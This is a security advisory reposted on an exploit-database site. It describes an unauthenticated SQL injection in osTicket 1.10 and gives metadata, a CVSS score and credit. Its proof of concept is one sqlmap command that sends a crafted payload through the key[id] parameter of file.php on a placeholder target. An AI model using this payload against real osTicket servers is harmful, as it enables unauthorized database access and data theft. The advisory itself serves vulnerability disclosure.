[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

osTicket 1.10 - SQL Injection Vulnerability

Author
Mehmet Ince
Risk
[
Security Risk High
]
0day-ID
0day-ID-28498
Category
web applications
Date add
13-09-2017
Platform
php
1. ADVISORY INFORMATION
========================================
Title: osTicket v1.10 Unauthenticated SQL Injection
Application: osTicket
Bugs:  SQL Injection
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Authentication Required: NO
Versions Affected: <= v1.10
Technology: PHP
Vendor URL: http://osticket.com/
CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Date of found: 12 Sep 2017
Author: Mehmet Ince
Advisory:
https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/
 
2. CREDIT
========================================
This vulnerability was identified during penetration test
by Mehmet INCE from PRODAFT / INVICTUS
 
3. VERSIONS AFFECTED
========================================
osTicket < 1.10
 
5. Technical Details & POC
========================================
Please visit an advisory URL for technical details.
 
PoC code:
python sqlmap.py -u "
http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL
 
6. RISK
========================================
The vulnerability allows remote attackers to execute a sql query on
database system.
 
7. REFERENCES
========================================
https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/

#  0day.today [2024-11-16]  #